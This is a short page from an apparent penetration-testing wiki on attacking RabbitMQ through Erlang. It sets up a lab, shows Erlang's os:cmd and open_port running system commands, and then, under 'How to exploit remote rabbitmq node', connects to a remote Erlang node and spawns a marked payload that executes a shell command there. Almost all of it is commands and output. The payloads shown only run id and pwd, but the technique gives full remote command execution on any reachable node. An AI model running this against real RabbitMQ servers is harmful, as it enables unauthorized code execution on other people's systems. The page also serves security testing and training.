pentest-wiki
pentest-wiki copied to clipboard
nixawk
[database] rabbitmq hacking
Setup an env lab
$ sudo apt-get install rabbitmq-server
$ sudo service rabbitmq-server start
$ sudo rabbitmqctl -q cluster_status
Elang executes os command
os:cmd runs command in sync mode. open_port in async mode.
$ erl
Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false]
Eshell V9.2 (abort with ^G)
1> os:cmd('/usr/bin/id').
"uid=1000(debug) gid=1001(hadoopgroup) groups=1001(hadoopgroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)\n"
2> erlang:open_port({spawn, "/bin/pwd > /tmp/testfile"}, [{line,80},exit_status,eof,stderr_to_stdout]).
#Port<0.385>
3> spawn(fun() ->
P5 = erlang:open_port({spawn, "/bin/pwd"},
[stderr_to_stdout, in, exit_status,
binary,stream, {line, 255}]),
receive {P5, Data} ->
io:format("Data ~p~n",[Data])
end
end).
How to exploit remote rabbitmq node
$ erl -sname test
Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false]
Eshell V9.2 (abort with ^G)
(test@debug-x)1>
> net_kernel:connect('test@debug-x').
true
> [[----Payload Start
erlang:spawn('test@debug-x', fun() ->
P5 = erlang:open_port({spawn, "/bin/pwd"},
[stderr_to_stdout, in, exit_status,
binary,stream, {line, 255}]),
receive {P5, Data} ->
io:format("Data ~p~n",[Data])
end
end).
----Payload End]]
Data {data,{eol,<<"/home/debug">>}}
> init:stop().
ok
Reference
- https://malicious.link/post/2018/erlang-arce/
- http://site4fast.blogspot.com/2011/09/what-is-erlang-openport-and-oscmd.html
- https://stackoverflow.com/questions/15831137/how-to-continuously-show-os-command-output-in-erlang
- https://piotrga.wordpress.com/2010/04/02/how-to-run-a-system-command-in-erlang/
- http://erlang.org/doc/reference_manual/functions.html
- https://www.rabbitmq.com/clustering.html#erlang-cookie
